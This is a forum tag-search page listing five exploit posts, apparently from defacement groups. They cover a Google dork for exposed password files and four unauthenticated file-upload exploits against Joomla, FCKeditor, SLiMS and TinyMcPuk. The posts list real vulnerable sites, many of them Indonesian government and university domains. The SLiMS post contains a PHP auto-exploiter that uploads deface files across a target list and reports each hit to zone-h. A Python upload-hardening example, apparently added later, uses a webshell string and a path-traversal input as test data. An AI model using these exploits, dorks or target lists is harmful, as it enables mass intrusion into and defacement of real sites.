Forum features
  • Guests can take part in discussions in the Q&A section without registering on the site, and if they have a problem or question they can post their topic in the relevant forum


Search the forums

Showing results for the tag 'file'.

103 results found

  1. [+] Exploit Title: File containing passwords host Bypass Vulnerability
     [+] Date: 17/10/2018
     [+] Exploit Author: Rednofozi
     [+] Tested on: Windows 10, Parrot OS
     [+] Vendor Homepage: https://fenek.io
     [+] dork: inurl:/host.txt + filetype:txt + "password"
     [+] MY page: https://cxsecurity.com/author/Inj3ct0r
     [+] ME: Rednofozi@hotmail.com
     [+] ME: inj3ct0r@tuta.io
     [+] fb.me: https://www.facebook.com/saeid.hat.3
     --------------------------------------------------------------
     [+] RHG hackers iran team
     [+] Credits: Rednofozi Anonysec hackers iran team
     [+] Vulnerability Type: host Bypass
     [+] Severity Level: Med.
     [+] Exploit: info --------------> host Bypass Vulnerability
     ***************************************************************
     [+] Google Search: inurl:/host.txt + filetype:txt + "password"
     [+] The End, Enjoy Of Hacking ...!
     [+] http://www.zone-h.org/mirror/id/31722197
     ***************************************************************
     --------------------------------------------------------------
     Host Bypass Vulnerability
     https://android-bible.com/bible/Infos%20Host.txt
     https://fenek.io/ui/i18n/en_US/host.txt
     https://forums.fogproject.org/assets/uploads/files/1478478282469-dotfogsettings-host.txt?v=qt568d7l06g
     About 110 results
     Enjoy Of Hacking ...!
     ****************************************************************
     Discovered by: Rednofozi | RHG Team hackers
     Thanks To: ReZa CLONER, Moeein Seven.
     Rednofozi.Inj3ct0r
     http://www.exploit4arab.org/exploits/2166
  2. # Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability
     # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
     # Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/
     # Tested On : Windows and Linux
     # Category : WebApps
     # Exploit Risk : Medium
     # CVE : CVE-2018-7316
     # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
     # CXSecurity : cxsecurity.com/ascii/WLB-2018090270
     # Cyberizm : cyberizm.org/cyberizm-joomla-com-biblestudy-proclaim-mediafileform-exploit.html
     #################################################################################################
     # Google Dork : inurl:''/index.php?option=com_biblestudy''
     # Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1
     # Note : Go to the '' Media Files '' Category. Choose your File and Upload it.
     # Directory File Path : TARGET/images/biblestudy/media/....
     #################################################################################################
     # Example Vulnerable Sites =>
     kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1
     => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe
     hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1
     [ Proof of Concept ] => archive.is/oEPx3
     cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1
     #################################################################################################
     # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
     #################################################################################################
  3. # Exploit Title : Developed by Rate it Services Business Solutions Mājas lapu izstrāde FCKeditor Remote File Upload Vulnerability
     # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
     # Vendor Homepage : rate.lv
     # Tested On : Windows
     # Category : WebApps
     # Exploit Risk : Medium
     # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
     # CXSecurity : cxsecurity.com/ascii/WLB-2018060245
     # Cyberizm : cyberizm.org/cyberizm-developed-by-rateit-services-business-solutions-exploit.html
     #################################################################################################
     # Title : Developed by Rate Business Solutions Mājas lapu izstrāde Latvia FCKeditor Remote File Upload Vulnerability
     # Google Dorks :
     intext:''Developed by: RATE Business Soltuions''
     intext:''Developed By: Mājas lapu izstrāde''
     intext:''Developed by: RATE IT SERVICES''
     # Exploit : /jscripts/editor/filemanager/connectors/uploadtest.html
     # Path : /allfiles/...
     #################################################################################################
     # Example Vulnerable Sites : There are 31 domains hosted on this server. => 178.16.24.19
     btp.travel/jscripts/editor/filemanager/connectors/uploadtest.html => [ Proof of Concept ] => archive.is/HWzoL => archive.is/s2AaH
     behold.lv/jscripts/editor/filemanager/connectors/uploadtest.html
     hotelsinpl.com/jscripts/editor/filemanager/connectors/uploadtest.html
     bhyper.com/jscripts/editor/filemanager/connectors/uploadtest.html
     hotelsinwarsaw.eu/jscripts/editor/filemanager/connectors/uploadtest.html
     gobaltic.com/jscripts/editor/filemanager/connectors/uploadtest.html
     eursecure.com/jscripts/editor/filemanager/connectors/uploadtest.html
     #################################################################################################
     # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
     #################################################################################################
  4. #Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Remote File Upload Exploit
     #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
     #Vendor Homepage : slims.web.id
     #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/
     #Affected Version : 5/6/7
     #Tested on : Windows / Linux
     #Exploit Risk : High
     #CXSecurity : cxsecurity.com/ascii/WLB-2018050260
     #Cyberizm : cyberizm.org/cyberizm-slims-senayan-library-management-system-indo-exploit.html
     ##############################################################################################################
     # Long Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter
     #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit

     Exploit Description :
     SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is built on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks.

     Features :
     Online Public Access Catalog (OPAC) with thumbnail document image support (can be used for book cover), Simple Search and Advanced Search mode
     Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) attachment in each bibliographic record support
     Documents record detail in MODS (Metadata Object Description Schema) XML format
     RSS (Really Simple Syndication) XML format for OPAC
     OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose
     Bibliographic/catalog database management with book cover image support
     Serial publication control
     Document items (book copies) management with barcode support
     Master Files management to manage document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers
     Circulation support with following sub-features : Loan and Return transaction, Collections reservation, Quick return, Configurable and flexible Loan Rules
     Membership management
     Stock Taking module to help Stock Opname process in library
     Reporting and Statistics
     System modules with following sub-features : Global system configuration, Modules management, Application Users and Groups management, Holiday settings, Barcodes generator utility, Database backup utility
     Responsive user interface
     3rd party bibliographic records indexing support with Sphinx Search and MongoDB

     Demo Version : softaculous.com/softaculous/demos/SLiMS
     Admin Username: admin
     Admin Password: pass
     ##############################################################################################################
     #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability
     Original Affected Code Here =>
     # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] =>
     [code]
     <?php
     /**
      * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com)
      *
      * This program is free software; you can redistribute it and/or modify
      * it under the terms of the GNU General Public License as published by
      * the Free Software Foundation; either version 3 of the License, or
      * (at your option) any later version.
      *
      * This program is distributed in the hope that it will be useful,
      * but WITHOUT ANY WARRANTY; without even the implied warranty of
      * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
      * GNU General Public License for more details.
      *
      * You should have received a copy of the GNU General Public License
      * along with this program; if not, write to the Free Software
      * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
      *
      */

     /* Biblio file Adding Pop Windows */

     // key to authenticate
     define('INDEX_AUTH', '1');
     // key to get full database access
     define('DB_ACCESS', 'fa');

     // main system configuration
     require '../../../sysconfig.inc.php';
     // IP based access limitation
     require LIB_DIR.'ip_based_access.inc.php';
     do_checkIP('smc');
     do_checkIP('smc-bibliography');
     // start the session
     require SENAYAN_BASE_DIR.'admin/default/session.inc.php';
     require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php';
     require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php';
     require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php';
     require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php';
     require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php';
     require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php';

     // privileges checking
     $can_write = utility::havePrivilege('bibliography', 'w');
     if (!$can_write) {
         die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>');
     }

     // page title
     $page_title = 'File Attachment Upload';

     // check for biblio ID in url
     $biblioID = 0;
     if (isset($_GET['biblioID']) AND $_GET['biblioID']) {
         $biblioID = (integer)$_GET['biblioID'];
     }
     // check for file ID in url
     $fileID = 0;
     if (isset($_GET['fileID']) AND $_GET['fileID']) {
         $fileID = (integer)$_GET['fileID'];
     }

     // start the output buffer
     ob_start();

     /* main content */
     // biblio topic save proccess
     if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') {
         $uploaded_file_id = 0;
         $title = trim(strip_tags($_POST['fileTitle']));
         $url = trim(strip_tags($_POST['fileURL']));
         // create new sql op object
         $sql_op = new simbio_dbop($dbs);
         // FILE UPLOADING
         if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) {
             // create upload object
             $file_dir = trim($_POST['fileDir']);
             $file_upload = new simbio_file_upload();
             $file_upload->setAllowableFormat($sysconf['allowed_file_att']);
             $file_upload->setMaxSize($sysconf['max_upload']*1024);
             $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir));
             $file_upload_status = $file_upload->doUpload('file2attach');
             if ($file_upload_status === UPLOAD_SUCCESS) {
                 $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1);
                 $fdata['uploader_id'] = $_SESSION['uid'];
                 $fdata['file_title'] = $dbs->escape_string($title);
                 $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename);
                 $fdata['file_url'] = $dbs->escape_string($url);
                 $fdata['file_dir'] = $dbs->escape_string($file_dir);
                 $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc'])));
                 $fdata['mime_type'] = $sysconf['mimetype'][$file_ext];
                 $fdata['input_date'] = date('Y-m-d H:i:s');
                 $fdata['last_update'] = $fdata['input_date'];
                 // insert file data to database
                 @$sql_op->insert('files', $fdata);
                 $uploaded_file_id = $sql_op->insert_id;
                 utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')');
             } else {
                 echo '<script type="text/javascript">';
                 echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');';
                 echo 'self.close();';
                 echo '</script>';
                 die();
             }
         } else {
             if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) {
                 $fdata['uploader_id'] = $_SESSION['uid'];
                 $fdata['file_title'] = $dbs->escape_string($title);
                 $fdata['file_name'] = $dbs->escape_string($url);
                 $fdata['file_url'] = $dbs->escape_string($fdata['file_name']);
                 $fdata['file_dir'] = 'literal{NULL}';
                 $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc'])));
                 $fdata['mime_type'] = 'text/uri-list';
                 $fdata['input_date'] = date('Y-m-d H:i:s');
                 $fdata['last_update'] = $fdata['input_date'];
                 // insert file data to database
                 @$sql_op->insert('files', $fdata);
                 $uploaded_file_id = $sql_op->insert_id;
             }
         }

         // BIBLIO FILE RELATION DATA UPDATE
         // check if biblio_id POST var exists
         if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) {
             $updateBiblioID = (integer)$_POST['updateBiblioID'];
             $data['biblio_id'] = $updateBiblioID;
             $data['file_id'] = $uploaded_file_id;
             $data['access_type'] = trim($_POST['accessType']);
             $data['access_limit'] = 'literal{NULL}';
             // parsing member type data
             if ($data['access_type'] == 'public') {
                 $groups = '';
                 if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) {
                     $groups = serialize($_POST['accLimit']);
                 } else {
                     $groups = 'literal{NULL}';
                 }
                 $data['access_limit'] = trim($groups);
             }
             if (isset($_POST['updateFileID'])) {
                 $fileID = (integer)$_POST['updateFileID'];
                 // file biblio access update
                 $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID);
                 // file description update
                 $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID);
                 if ($update1) {
                     echo '<script type="text/javascript">';
                     echo 'alert(\''.__('File Attachment data updated!').'\');';
                     echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');';
                     echo '</script>';
                 } else {
                     utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error);
                 }
             } else {
                 if ($sql_op->insert('biblio_attachment', $data)) {
                     echo '<script type="text/javascript">';
                     echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');';
                     echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');';
                     echo '</script>';
                 } else {
                     utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error);
                 }
             }
             utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data');
         } else {
             if ($uploaded_file_id) {
                 // add to session array
                 $fdata['file_id'] = $uploaded_file_id;
                 $fdata['access_type'] = trim($_POST['accessType']);
                 $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata;
                 echo '<script type="text/javascript">';
                 echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');';
                 echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');';
                 echo '</script>';
             }
         }
     }

     // create new instance
     $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post');
     $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"';
     // form table attributes
     $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"';
     $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"';
     $form->table_content_attr = 'class="alterCell2"';

     // query
     $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID");
     $file_attach_d = $file_attach_q->fetch_assoc();

     // edit mode
     if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) {
         $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']);
         $form->addHidden('updateFileID', $file_attach_d['file_id']);
     } else if ($biblioID) {
         $form->addHidden('updateBiblioID', $biblioID);
     }

     // file title
     $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"');
     // file attachment
     if ($file_attach_d['file_name']) {
         $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']);
     } else {
         // file upload dir
         // create simbio directory object
         $repo = new simbio_directory(REPO_BASE_DIR);
         $repo_dir_tree = $repo->getDirectoryTree(5);
         $repodir_options[] = array('', __('Repository ROOT'));
         if (is_array($repo_dir_tree)) {
             // sort array by index
             ksort($repo_dir_tree);
             // loop array
             foreach ($repo_dir_tree as $dir) {
                 $repodir_options[] = array($dir, $dir);
             }
         }
         // add repo directory options to select list
         $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options);
         // file upload
         $str_input = simbio_form_element::textField('file', 'file2attach');
         $str_input .= ' Maximum '.$sysconf['max_upload'].' KB';
         $form->addAnything(__('File To Attach'), $str_input);
     }
     // file url
     $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"');
     // file description
     $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"');
     // file access
     $acctype_options[] = array('public', __('Public'));
     $acctype_options[] = array('private', __('Private'));
     $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']);
     // file access limit if set to public
     $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type');
     $group_options = array();
     while ($group_data = $group_query->fetch_row()) {
         $group_options[] = array($group_data[0], $group_data[1]);
     }
     $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null );

     // print out the object
     echo $form->printOut();
     /* main content end */
     $content = ob_get_clean();
     // include the page template
     require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';
     [/code]
     ##############################################################################################################
     #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit
     #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
     #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
     #Google Dork 3 : inurl:''/slims5-meranti/'' site:id
     #Google Dork 4 : intext:''This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
     #Google Dork 5 : Powered by SLiMS site:id
     #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
     #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan.
     #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
     #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL.
     #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3
     #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
     #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
     #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
     #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
     #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
     #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC
     Note : Use your brain to find more dorks.
     Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version.
     #Exploit Code : ..../admin/modules/bibliography/pop_attach.php
     #Path : /repository/....
     # Note : Fill the form and choose your file and upload it.
     # Allowed File Extensions : txt jpg gif png
     #Indonesian Government / Education Sites are vulnerable for this issue.
     #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool.
     ##############################################################################################################
     #Auto Exploiter PHP Code =>
     [code]
     <?php
     /*
     # KingSkrupellos from Cyberizm Digital Security Team
     # Our Security Forum : cyberizm.org
     # Twitter : twitter.com/kngskrplls
     # your list.txt must be in the same directory as this exploiter
     # ###############################################
     # This Exploit and Vulnerability was discovered by KingSkrupellos
     # Thanks for All Moslem Hackers and Cyberizm Digital Security Team
     # This Exploiter may sometimes not work 100% because sometimes the bot doesn't understand the command.
     # If the bot doesn't understand the command, please exploit it manually.
     # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team
     #################################################
     # note : Please do not remove Cyberizm copyright.
     # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team
     */
     echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team ";
     echo "Input your target list: ";
     $list = trim(fgets(STDIN));
     $shell = "yourdefacefilename.txt";
     $nickzoneh = "KingSkrupellos";
     $exploit = "/admin/modules/bibliography/pop_attach.php";
     $path = "/repository/";
     $open = fopen("$list","r");
     $size = filesize("$list");
     $read = fread($open,$size);
     $lists = explode("\r\n",$read);
     echo "\n";
     foreach($lists as $target){
         if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
             $targets = "http://$target";
         }else{
             $targets = $target;
         }
         echo "Target => $targets\n";
         // step 1: probe the upload form
         echo " [*] Checking Path : ";
         $cd = curl_init("$targets$exploit");
         curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
         curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
         curl_exec($cd);
         $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
         curl_close($cd);
         if($httpcode == 200){
             echo "200 OK\n";
             // step 2: multipart POST of the file through the attachment form
             echo " [*] Uploading shell : ";
             $ch = curl_init();
             curl_setopt($ch, CURLOPT_URL, "$targets/$exploit");
             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
             curl_setopt($ch, CURLOPT_POST, 1);
             curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang"));
             curl_exec($ch);
             // step 3: fetch the file from the repository directory to confirm it landed
             $cek = curl_init();
             curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
             curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
             curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
             $ceek = curl_exec($cek);
             $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
             if(preg_match("/hacked/",$ceek) or $ceeks == 200){
                 echo "OK $targets$path$shell\n";
                 // step 4: submit the mirror to zone-h
                 echo " [*] Zone-H : ";
                 $zh = curl_init("http://zone-h.org/notify/single");
                 curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
                 curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
                 curl_setopt($zh, CURLOPT_POST, 1);
                 curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
                 $postzh = curl_exec($zh);
                 if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
                     echo "OK\n\n";
                 }else{
                     echo "NO\n\n";
                 }
             }else{
                 echo "Failed\n\n";
             }
         }else{
             echo "Not Vulnerable\n\n";
         }
     }
     [/code]
     Important Note : Only .txt .jpg .gif .png files are allowed.
     # Uploaded File Directory Path : TARGET/PATH/repository/.... TARGET/repository/....
     ##############################################################################################################
     # Example Sites :
     # perpustakaan.pn-bangli.go.id/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/dAL3j => archive.is/Ott9S
     # pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/lPDdv => archive.is/BNiKP
     # pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/veBCj - archive.is/GEOy6
     pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php
     pa-kualatungkal.go.id/pustaka/admin/modules/bibliography/pop_attach.php
     pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php
     pn-bangil.go.id/perpustakaan/data/admin/modules/bibliography/pop_attach.php
     pn-tabanan.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php
     perpustakaan.pn-balige.go.id/admin/modules/bibliography/pop_attach.php
     docrepository.undana.ac.id/admin/modules/bibliography/pop_attach.php
     digilib.stimata.ac.id/admin/modules/bibliography/pop_attach.php
     pustaka.pusair-pu.go.id/akasia/admin/modules/bibliography/pop_attach.php
     perpustakaan.pn-donggala.go.id/admin/modules/bibliography/pop_attach.php
     perpustakaan.stikes-paguwarmas.ac.id/admin/modules/bibliography/pop_attach.php
     opac.staiattanwir.ac.id/repository/admin/modules/bibliography/pop_attach.php
     opac.lib.idu.ac.id/library_unhan/admin/modules/bibliography/pop_attach.php
     www.perpustakaanbalitsereal.com/admin/modules/bibliography/pop_attach.php
     epository.hafshawaty.ac.id/admin/modules/bibliography/pop_attach.php
     perpusffup.univpancasila.ac.id/admin/modules/bibliography/pop_attach.php
     perpus.stikesmedikacikarang.ac.id/slim/admin/modules/bibliography/pop_attach.php
     rbaca.bukitasamfoundation.com/perpustakaan/admin/modules/bibliography/pop_attach.php
     e-library.darunnajah.ac.id/admin/modules/bibliography/pop_attach.php
     ##############################################################################################################
     # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army
     ##############################################################################################################
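The pop_attach.php handler quoted in result 4 takes its allowed-extension list from configuration, derives the extension from the last dot in the stored name, and joins the client-supplied fileDir onto REPO_BASE_DIR as posted. What follows is an added example written for this page, not SLiMS code and not part of the post, showing the checks a hardened upload path would run before anything touches the repository: an extension allowlist, a content check against the extension, confinement of the requested directory to the repository root, and a server-generated filename. The repository root, the size limit, the signature table and all sample files are assumptions constructed for the example.

```python
import os
import secrets
from pathlib import Path

# Assumed configuration; stands in for $sysconf['allowed_file_att'],
# $sysconf['max_upload'] and REPO_BASE_DIR in the PHP shown above.
ALLOWED_EXT = {"txt", "jpg", "gif", "png"}
MAX_SIZE = 2 * 1024 * 1024  # bytes

# Standard file signatures for the binary formats on the allowlist.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
}


class UploadRejected(ValueError):
    """Raised with a short reason when a file must not be stored."""


def extension_of(filename: str) -> str:
    """Extension after the last dot, lower-cased, taken from the bare name.

    'shell.php.txt' yields 'txt', exactly as strrpos() does in the PHP; the
    content check below is what keeps such a file from being anything but text.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base or base.endswith("."):
        raise UploadRejected("no usable extension")
    return base.rsplit(".", 1)[1].lower()


def check_content(ext: str, data: bytes) -> None:
    """Reject bodies that do not look like the type the extension claims."""
    if len(data) > MAX_SIZE:
        raise UploadRejected("larger than MAX_SIZE")
    if ext in MAGIC:
        if not data.startswith(MAGIC[ext]):
            raise UploadRejected(f"body is not a {ext} file")
        return
    # txt: must be real text. Script markers are refused as well, so a server
    # that has been told to run .txt (a stray AddHandler or .htaccess) gets nothing
    # to execute; this is defence in depth, not a substitute for that config.
    if b"\x00" in data:
        raise UploadRejected("binary data in text upload")
    lowered = data.lower()
    if b"<?php" in lowered or b"<?=" in lowered or b"<script" in lowered:
        raise UploadRejected("script content in text upload")


def confined_dir(repo_root: str, requested_dir: str) -> Path:
    """Resolve the client-chosen sub-directory and insist it stays under the root."""
    root = Path(repo_root).resolve()
    target = (root / requested_dir.strip("/\\")).resolve()
    if target != root and root not in target.parents:
        raise UploadRejected("directory escapes the repository root")
    return target


def plan_upload(repo_root: str, requested_dir: str, filename: str, data: bytes) -> Path:
    """Run every check; return the path the file may be written to."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f".{ext} is not on the allowlist")
    check_content(ext, data)
    # server-generated name: the client's file name never reaches the filesystem
    return confined_dir(repo_root, requested_dir) / f"{secrets.token_hex(16)}.{ext}"


def vet_upload(repo_root: str, requested_dir: str, filename: str, data: bytes):
    """('accept', path) or ('reject', reason), for callers that prefer not to catch."""
    try:
        return "accept", str(plan_upload(repo_root, requested_dir, filename, data))
    except UploadRejected as why:
        return "reject", str(why)


if __name__ == "__main__":
    PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed sample
    for sub_dir, name, body in [
        ("images", "cover.png", PNG),
        ("", "notes.txt", b"plain notes"),
        ("", "shell.php", b"<?php system($_GET['c']); ?>"),
        ("", "shell.php.txt", b"<?php system($_GET['c']); ?>"),
        ("", "cover.png", b"<?php echo 1; ?>"),
        ("../../var/www/html", "x.txt", b"hello"),
    ]:
        print(sub_dir or "<root>", name, "->", vet_upload("/srv/slims/repository", sub_dir, name, body))
```

The ordering matters: the extension is decided first and never re-derived from the body, the body is then checked against that extension, and only then is a write location computed. Storing under a random name with the vetted extension removes both the client name and any double-extension trick from the stored path; serving the repository with script execution disabled is still required on the web-server side.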
  5. # Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability
     # Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
     # Vendor Homepage => mediatechindonesia.com
     # Google Dork => All rights reserved. © 2015 Media Tech Indonesia
     # CWE-264 - [ Permissions, Privileges, and Access Controls ]
     # CXSecurity : cxsecurity.com/ascii/WLB-2018050180
     # Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html
     #################################################################################
     Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm
     Please upload your file as => /yourfilename.htm.fla
     Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla
     #################################################################################
     Example Sites and Target IP => 103.27.206.203
     daihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     toyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     promosidoarjodaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     promomobiltoyotasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
